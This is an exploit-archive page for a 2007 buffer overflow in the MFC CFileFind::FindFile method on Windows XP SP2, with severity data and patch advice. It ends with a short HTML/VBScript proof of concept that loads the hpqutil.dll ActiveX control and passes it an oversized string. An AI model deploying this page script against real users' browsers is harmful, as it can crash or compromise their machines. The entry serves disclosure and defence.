header-logo
Suggest Exploit
vendor:
Microsoft Windows
by:
Not mentioned
7.5
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: Microsoft Windows
Affected Version From: Microsoft Windows XP SP2
Affected Version To: Not mentioned
Patch Exists: YES
Related CWE: CVE-2007-3039
CPE: o:microsoft:windows_xp::sp2
Metasploit:
Other Scripts:
Platforms Tested: Windows
2007

Buffer Overflow Vulnerability in CFileFind::FindFile Method

The CFileFind::FindFile method in the MFC library for Microsoft Windows is prone to a buffer-overflow vulnerability because the method fails to perform adequate boundary checks of user-supplied input. Successfully exploiting this issue may allow attackers to execute arbitrary code in the context of applications that use the vulnerable method.

Mitigation:

Apply the latest security patches from Microsoft to fix the vulnerability. Avoid using or exposing the vulnerable method in applications.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/25697/info

The CFileFind::FindFile method in the MFC library for Microsoft Windows is prone to a buffer-overflow vulnerability because the method fails to perform adequate boundary checks of user-supplied input.

Successfully exploiting this issue may allow attackers to execute arbitrary code in the context of applications that use the vulnerable method.

The MFC library included with Microsoft Windows XP SP2 is affected; other versions may also be affected.

This issue also occurs in the 'hpqutil.dll' ActiveX control identified by CLSID: F3F381A3-4795-41FF-8190-7AA2A8102F85. 

<object classid='clsid:F3F381A3-4795-41FF-8190-7AA2A8102F85' id='pAF'>
</object>
<input type="button" value="heap" language="VBScript" OnClick="OuCh()">
<script language="VBScript">
sub OuCh()
Var_0 = String(620, "A")
pAF.ListFiles Var_0
End Sub
</script>